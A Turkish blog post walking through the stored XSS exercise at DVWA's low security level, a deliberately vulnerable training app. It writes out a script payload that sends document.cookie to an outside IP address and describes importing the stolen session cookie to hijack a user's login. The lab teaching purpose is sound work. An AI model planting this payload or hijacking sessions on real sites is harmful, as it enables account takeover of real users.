Mayıs 27, 2022
11 11 11 ÖÖ
2048 Old Game Privacy Policy
Scan Text – Metin Tarayıcı Terms & Conditions
Scan Text – Metin Tarayıcı Privacy Policy
Calculator – Hesap Makinesi Privacy Policy
Calculator – Hesap Makinesi Terms & Conditions
QR Code Reader – Kare Kod Okuyucu Terms & Conditions
QR Code Reader – Kare Kod Okuyucu Privacy Policy
Show PDF – PDF Görüntüleyici Terms & Conditions
Show PDF – PDF Görüntüleyici Privacy Policy
Photo Editor – Resim Düzenleme Uygulaması Terms & Conditions
Son Yazılar
2048 Old Game Privacy Policy Scan Text – Metin Tarayıcı Terms & Conditions Scan Text – Metin Tarayıcı Privacy Policy Calculator – Hesap Makinesi Privacy Policy Calculator – Hesap Makinesi Terms & Conditions QR Code Reader – Kare Kod Okuyucu Terms & Conditions QR Code Reader – Kare Kod Okuyucu Privacy Policy Show PDF – PDF Görüntüleyici Terms & Conditions Show PDF – PDF Görüntüleyici Privacy Policy Photo Editor – Resim Düzenleme Uygulaması Terms & Conditions
dvwa walkthrough

Stored XSS (Low Level)

Paylaşım , Takip İçin

Stored XSS Nedir ?

Kısaca anlatacak olursak kullanıcının girdiği veriyi ekrana yansıtan bir kısım var ise bu kısma bakıyor olacağız. Stored XSS in Reflected XSS den farkı sunucuya gitmeden veritabanına gidip veritabanından verimizi göstermesidir.

Eğer bu kısımda kısıtlama , filtreleme , blocklama , güvenlik yoksa gireceğimiz script ile işlemlerimizi yapmış olacağız. Low level de ise hiçbir güvenlik önlemi yoktur. Bu yüzden bu tarz güvenlik önlemi olmayan siteleri günümüzde görmek zordur. 

İlk önce mesaj kısmına script kodumuzu giremediğimiz için uzunluğun az olmasından dolayı message kısmına gelip sağ tıklayıp element kısmını açıyoruz.

Daha sonra resimdeki kısımdan 50 olan max length kısmını 500 yapıyoruz .

Daha sonra aşşağıdaki kodu yazıp sign guestbook diyoruz. 

<script> window.location.href=”http://192.168.138.128/index.php?cookie=” + document.cookie;</script>

Tabi bu kısımda bir takım aksaklıklar nedeni ile yanlış adres girildiği için ekranımız gelmiyor fakat bizim çerezimiz çalışmış oluyor. phpsessid ve security leveli gözüküyor.

Daha sonra cookie edit uzantısı ekliyoruz. 

Ekledikten sonra bu kısma gelip bizim biraz önce bulduğumuz security ve phpsessid kısmını girdikten sonra kaydedip ana sayfaya geçmeyi deniyoruz.

Ve gördüğünüz gibi ana sayfaya giriş yapan kullanıcının çerezleri ile giriş yapmış oluyoruz.


Paylaşım , Takip İçin
5 1 vote
Article Rating

Bir Cevap Yazın

0 Yorum
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x
HAYALİNDEKİ YAZILIM
%d blogcu bunu beğendi: